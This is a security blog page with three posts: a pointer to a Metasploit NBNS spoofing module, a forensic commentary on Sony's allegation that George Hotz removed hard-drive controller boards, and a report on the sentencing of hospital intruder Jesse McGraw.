Tim Medin, over at the excellent Packetstan blog, just wrote up an excellent post detailing the implementation of a NBNS spoofing module which has been added to the the latest Metasploit trunk:

This module is based off an old tool, nbnspoof.py, that I wrote to perform this attack, originally described (as nearly as I can tell) by Sumit Siddharth. It’s a very simple attack, taking advantage of the way Windows proceeds to NetBIOS Name Service lookups once local and DNS lookups fail. If you’ve ever turned a careful eye to broadcast traffic on any network with Windows systems, you’ve probably noticed that a surprising number of lookups fail through to NBNS for various reasons.

Tim does a great job of describing how the spoofing works, how to use it in the context of a penetration test, and how the module was developed. Due to its integration into the current version of the Metasploit framework, I’d have to say that I recommend it over the original python version. Maybe one day soon I’ll one-up him and try to turn it into a meterpreter post-exploitation script, in order to hijack remote hosts into being spoofers ;-) .

Until then, and in related news, I’ve submitted a talk on some other forms of Metasploit sorcery that I have developed recently to Defcon (and tomorrow to Blackhat once the CFP opens). With any luck I’ll be speaking at one or the other later this year. Either way, I’ll see some of my readers there, hopefully!


EDIT: I have found some clarification about the “controller cards”, seemingly confirming what I have posted, and have added thoughts to the end of this post

Today, on the Wired Threat Level blog, there is a story that covers Sony’s allegations that George Hotz (“geohot”), who they are suing for DMCA violations involving a PlayStation 3 jailbreak, sabotaged hard drives provided for discovery, and skipped town.

Skipping town to South America is not in my area of expertise, so I’m not commenting on whether or not that is happening, but forensic acquisition and analysis of hard drives happens to be my current bread-and-butter. The Wired article states that, regarding the hard drives, Sony claims that Hotz provided the hard drives in a non-functional state. This includes a link to a PDF from the case’s filings which includes the exact wording of Sony’s complaint on page 22:

Despite Judge Spero’s orders, Hotz continues to frustrate all attempts to complete jurisdictional discovery.  In yet another attempt to avoid his deposition and a limited inspection of his impounded hard drives, on March 17, 2011, Hotz filed a motion for protective order on issues already decided by Judge Spero.  (Docket No. 100.)  On the same day, TIG discovered that prior to delivery, Hotz had removed integral components from his impounded hard drives, rendering them completely non-functional.  Bricker Decl., ¶21, Exh. S.  When SCEA echoed TIG’s request that the components of the hard drives be delivered immediately, Hotz’s counsel responded that Hotz was in South America.

Hotz’s attorney’s quote to Wired in response to this was the following:

They didn’t have the controller card attached. That’s it

The attorney, I assume, does not have an extensive technical background, and likely gave this comment off the cuff (or as “off the cuff” as any attorney will allow themselves to be). Therefore, this is going to take some interpretation. The first question is what do they mean by “controller card”. When it comes to hard drives, two things come to my mind:

  • The interface between the chipset of the motherboard and the hard drive. For most motherboards the SATA or IDE interface is integrated into the board. If it’s an older computer that an end-user has added a SATA drive to, a SATA “controller card”, in the literal “card” sense, may be slotted into the motherboard to interface with the newer drive.
  • The circuit board attached to the drive that handles ATA commmunications on one side, and interacts with drive’s electrical and mechanical internals on the other side. To illustrate, it’s the part facing the camera in this image:

The Underside of a Hard Drive

The latter is what I assume is meant, for the following reasons:

  • It’s something that could be removed from a drive, as the filing states
  • Controller cards in the sense of a slotted card on a motherboard aren’t very common right now. Most computers have the interface they need on the motherboard.
  • Even if it was a SATA, IDE, or even SCSI controller card meant to be slotted into a motherboard, not providing this card would not render the drive unreadable to a well-outfitted forensics lab that TIG (the third party forensic examiner Sony is using) would have.

Now, I do not support Sony’s lawsuit against George Hotz, but it seems to me that if he did remove those controller boards from the drives, this is a case of needlessly antagonizing the opposing counsel, examiners, and the judge. I really don’t think it’s a good idea to intentionally do this when providing evidence under a court order.

Those boards don’t just fall off, and the absence of them is not something that is as easy to overcome as Hotz’s attorney implies. To read a drive that has had this board removed, you would need an identical board. Those who do data recovery in cases where this board has been damaged know that extreme care needs to be taken in finding a replacement. Even drives of the same model and capacity can have different revisions of these boards, and it’s crucial to get a match. Even a forensics firm such as TIG is not likely to maintain a stockpile of various controller boards from drives, as it would be prohibitively expensive to buy and file “one of everything”. The absence of the board (not just the failure of it) makes it even more difficult, as it may or may not be possible to determine the right revision of the board to use to replace it, without the original to compare.

While I disagree with the basis of the lawsuit and support the opening of electronic devices (all of my and my spouse’s Apple iPods, iPhones, and iPads are jailbroken), if this is the method being used to stall the plaintiff and case progress, I see that as being in bad form for Hotz, and a bigger issue than his attorney lets on. Hopefully not. Don’t make it hard for me to like you, geohot! Take the high road.

EDIT: I found the exhibit with the discussion of the missing hard drive parts at Groklaw:

This pretty much confirms the above with the following quotes from an examiner at TIG:

This controller card is  installed at the factory and not normally removed or handled by an end user.

We took the drives out of our evidence locker and the evidence bag to image them in their current encrypted state as stated in the order and agreed to on our phone call yesterday.   We have determined that the controller cards which are screwed onto the hard drives were removed prior to them being given to us.   Therefore we are unable to operate the hard drives in their current state.  Keep in mind that we need two days to image these drives as we have to image two 1TB drives.

It’s difficult to imagine a reason Hotz would have had to remove the circuit boards from the drives he was ordered to turn over. It will be very interesting to see why he did this. From my position, I can’t see this as being productive for anything other than antagonizing the opposing party and, more importantly, the judge.


Jesse William McGraw, who pleaded guilty to two counts of transmitting malicious code to systems at the hospital at which he worked (including a SCADA HVAC system’s HMI), was sentenced yesterday at the U.S. District Court for Northern Texas to 110 month of custody, followed by three years of supervised release. He has also been ordered to pay restitution in the amount of $31,881.75. This is according to the latest filing on his case on PACER:

He was facing a maximum of 10 years per count, which is higher than the usual 5 years per count due to the threat to public health and safety. At one point in the case last year, he had signed a plea agreement stating that he would plead guilty in exchange for a maximum sentence of 6 years. This fell through, however, when he reneged on the deal by pleading innocent on his next appearance in court. He was then re-indicted for 14 counts, which were dropped after he agreed to (and did) plead guilty to the original two counts, outside the scope of any agreement.

On a personal note, I feel that this is a fair sentence considering the circumstances. His actions jeopardized the safety of innocent people and attempted to destroy evidence and hinder the investigation after he was taken into custody. Even after he finally pleaded guilty, he continued to blame everyone but himself, as you can see in his “cross-site scripting tunneling” story he posted, or had someone post for him, from prison three months ago.  I originally felt very sorry for him, though it’s hard to have any sympathy for someone that has continually acted against his own best interests as long as he has.

The rest of the “Electronik Tribulation Army” have gone relatively quiet. Maybe this will be a wakeup call for them to get out of this game.

UPDATE: A good post on this from the folks at the Dallas Observer:

If you’re new to the site, these are the previous posts this is a followup to:

© 2012 McGrew Security Suffusion theme by Sayontan Sinha